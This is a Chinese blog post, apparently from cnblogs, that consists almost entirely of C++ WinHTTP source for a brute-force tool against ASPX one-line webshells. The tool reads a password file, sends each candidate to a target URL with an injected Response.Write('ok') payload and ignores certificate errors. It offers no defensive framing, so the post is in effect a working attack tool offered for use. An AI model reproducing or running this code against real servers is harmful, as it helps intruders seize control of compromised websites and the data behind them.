• ASPX一句话爆破工具


    #include "stdafx.h"
    #include <stdio.h>
    #include <Windows.h>
    #include <stdlib.h>
    #include <string.h>
    #include <string>
    #include <winhttp.h>
    #pragma comment(lib,"winhttp.lib")
    
    void banner() //显示banner
    {
    	printf("[-]:Webshell Aspx crack T00ls
    [-]:Welcome www.90sec.org
    ");
    }
    
    int _tmain(int argc, _TCHAR * argv [])
    {
    	DWORD dwsize = 0;
    	LPSTR pszOutBuffer;
    	LPBYTE lpHeader, lpData;
    	LPCWSTR Host = argv[1];
    	LPCWSTR Url = argv[2];
    	char buf[MAX_PATH] = {0}; //fgets接收字符串
    	FILE* fp;
    	int i = 0;
    
    	if (argc < 4) //如果入口长度小于4
    	{
    		banner();
    		printf("[-]:%S Host Domain_Url Password_List
    ",argv[0]);
    		return 0;
    	}
    
    	if ((fp = _wfopen(argv[3],L"rb")) == NULL) //打开文件,如果不存在
    	{
    		printf("File not found
    "); //打印错误
    		return 0;
    	}
    	while ((fgets(buf,MAX_PATH,fp))) //这儿注意,fgets读取文件,默认一行尾端会增加一个回车,我就是在这儿卡了一晚上
    	{
    		buf[strlen(buf) - 2] = ''; //倒数第二个字符,也就是回车,替换
    
    	HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", //定义访问sessions
    		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
    		WINHTTP_NO_PROXY_NAME,
    		WINHTTP_NO_PROXY_BYPASS,0);
    	if (Hinternet == NULL) //如果定义访问的sessions为空
    	{
    		printf("Failed to Initialize http sessions
    ");
    		return 0;
    	}
    
    	HINTERNET Hconnect = WinHttpConnect(Hinternet, //初始化连接
    		Host, //定义地址
    		INTERNET_DEFAULT_HTTPS_PORT,//默认端口443
    		0);
    
    	if (Hconnect == NULL) //如果为空,就close winhttp句柄
    	{
    		printf("Hconnect error
    ");
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	WCHAR* res = new WCHAR[MAX_PATH + 1]; //释放内存,准备写入数据
    	wsprintf(res,L"%s?%S=Response.Write("ok");Response.End()",Url,buf); //写入字符串到释放内存的变量里
    	HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, //准备传输,定义好格式
    		L"GET",
    		res,
    		L"HTTP /1.1",
    		WINHTTP_NO_REFERER,
    		WINHTTP_DEFAULT_ACCEPT_TYPES,
    		WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH);
    
    	if (Hrequest == NULL) 
    	{
    		WinHttpCloseHandle(Hinternet);
    		WinHttpCloseHandle(Hconnect);
    		return 0;
    	}
    
    	DWORD dwFlags;
    	DWORD dwBuffLen = sizeof(dwFlags);           
    	WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置查询选项
    		(LPVOID)&dwFlags, &dwBuffLen);
    	dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID;
    	dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
    
    	WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置选项
    		&dwFlags, sizeof (dwFlags) );
    
    	if (WinHttpSendRequest(Hrequest, //发送数据
    		WINHTTP_NO_ADDITIONAL_HEADERS,0,
    		WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE)
    	{
    		DWORD err  = GetLastError();
    		WinHttpCloseHandle(Hrequest);
    		WinHttpCloseHandle(Hconnect);
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) //开始读取相应
    	{
    		DWORD err = GetLastError();
    		WinHttpCloseHandle(Hrequest);
    		WinHttpCloseHandle(Hconnect);
    		WinHttpCloseHandle(Hinternet);
    		return 0;
    	}
    
    	DWORD dwSize = 0;
    	if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) //检查是否还有数据接受
    		printf( "Error %u in WinHttpQueryDataAvailable.
    ",
    		GetLastError());
    
    	WinHttpQueryHeaders(Hrequest, //查看http响应头
    		WINHTTP_QUERY_RAW_HEADERS_CRLF,
    		WINHTTP_HEADER_NAME_BY_INDEX,NULL,
    		&dwsize,WINHTTP_NO_HEADER_INDEX);
    	lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize);
    
    	WinHttpQueryHeaders(Hrequest, 
    		WINHTTP_QUERY_RAW_HEADERS_CRLF, 
    		WINHTTP_HEADER_NAME_BY_INDEX, 
    		lpHeader, &dwsize, 
    		WINHTTP_NO_HEADER_INDEX);
    	HeapFree(GetProcessHeap(), 0, lpHeader);
    	DWORD dwDownloaded = 0;
    	pszOutBuffer = new char[dwSize+1];
    	if (!pszOutBuffer)
    	{
    		printf("Out of memory
    ");
    	}
    
    	ZeroMemory(pszOutBuffer, dwSize+1); 
    	if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer, 
    		dwSize, &dwDownloaded))
    	{                                  
    		printf( "Error %u in WinHttpReadData.
    ", GetLastError());
    	}
    	if (strstr(pszOutBuffer,"ok"))
    	{
    		printf("Line:%d-->Find password Success:%s
    ",++i,buf);
    		return 0;
    	}else
    	{
    		printf("Line:%d-->password Not found:%s
    ",++i,buf);
    	}
    }
    	delete[] pszOutBuffer;
    	//delete[] res;
    	return 0;
    }
    
  • 相关阅读:
    [笔记]一道C语言面试题:IPv4字符串转为UInt整数
    linux内核代码注释 赵炯 第三章引导启动程序
    bcd码
    2章 perl标量变量
    1章 perl入门
    perl第三章 列表和数组
    浮动 float
    文字与图像
    3.深入理解盒子模型
    4.盒子的浮动和定位
  • 原文地址:https://www.cnblogs.com/killbit/p/4237808.html
Copyright © 2020-2023  润新知